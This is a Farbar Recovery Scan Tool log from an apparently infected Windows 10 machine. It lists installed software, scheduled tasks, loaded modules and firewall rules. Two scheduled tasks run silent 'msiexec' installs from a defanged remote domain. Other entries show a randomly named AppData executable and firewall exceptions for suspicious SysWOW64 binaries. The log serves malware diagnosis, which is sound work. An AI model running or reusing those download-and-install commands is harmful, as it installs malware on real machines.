Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{d98165f5-8b37-4100-8852-a0664374ff8a}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MKVToolNix 9.8.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 9.8.0 - Moritz Bunkus)
Mozilla Firefox 59.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 59.0.2 (x64 en-US)) (Version: 59.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 59.0.2.6656 - Mozilla)
NetTime (HKLM-x32\...\NetTime_is1) (Version: - Mark Griffiths)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0405-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Port Royale V1.4.0.2 (HKLM-x32\...\Port Royale_is1) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.60 (17.03.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.82.00(27.07.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.70.18.0 - Samsung Electronics Co., Ltd.)
Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.01.10 (20.06.2014) - Samsung Electronics Co., Ltd.)
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.0.17 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.25 - Samsung Electronics Co., Ltd.) Hidden
Samsung SCX-3400 Series (HKLM-x32\...\Samsung SCX-3400 Series) (Version: 1.29 (09.09.2015) - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Skype verze 8.33 (HKLM-x32\...\Skype_is1) (Version: 8.33 - Skype Technologies S.A.)
SMPlayer 17.1.0 (x64) (HKLM\...\SMPlayer) (Version: 17.1.0 - Ricardo Villalba)
SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd)
SoftPerfect WiFi Guard version 2.0.2 (HKLM\...\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1) (Version: 2.0.2 - SoftPerfect)
South Park The Fractured But Whole version 1.0 (HKLM\...\South Park The Fractured But Whole_is1) (Version: 1.0 - CODEPUNKS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.2.1.8 - Synaptics Incorporated)
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-195099987-321758953-278711717-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-05-18] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
Task: {0E14317D-2102-48FC-AAB8-68A9D0B3F691} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {106A7FD6-C7D6-418B-AF21-09A77484159A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {16447E2A-F695-419E-8243-9BF676ECAD36} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {2208097B-6069-4E4E-B34D-B6C6499D266E} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-195099987-321758953-278711717-1001 => C:\Users\ulol\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {23D45486-6328-445F-8E32-ADBAA1F22487} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {2BEBB49D-B57F-4F93-8080-66415D045BD2} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {598F7A69-A348-4C5E-A5CA-F3A37912C800} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-12-21] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6A20F2C7-5CF8-4654-BAC1-A87B26620985} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-02-26] (Advanced Micro Devices, Inc.)
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {7F911834-FCA6-409C-A3A1-BBEFD2BE1E88} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {90DD05AC-EC80-4EB1-B27B-C21214053600} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {A5DAA59E-7902-47D5-B0FC-63D446828035} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {AD4942CE-F2AB-45E9-A0F7-A0A0696AF497} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {C51D1053-58AD-40DC-8AD7-42F044919F19} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {C8ED55E2-B8FB-4DD4-8E05-EB726C93E126} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {D643AA16-031E-4AF0-9CA3-98406A054B0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2019-01-10 17:53 - 2018-11-15 11:01 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 000015872 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 007562752 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


There are 7865 more sites.


There are 7865 more sites.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
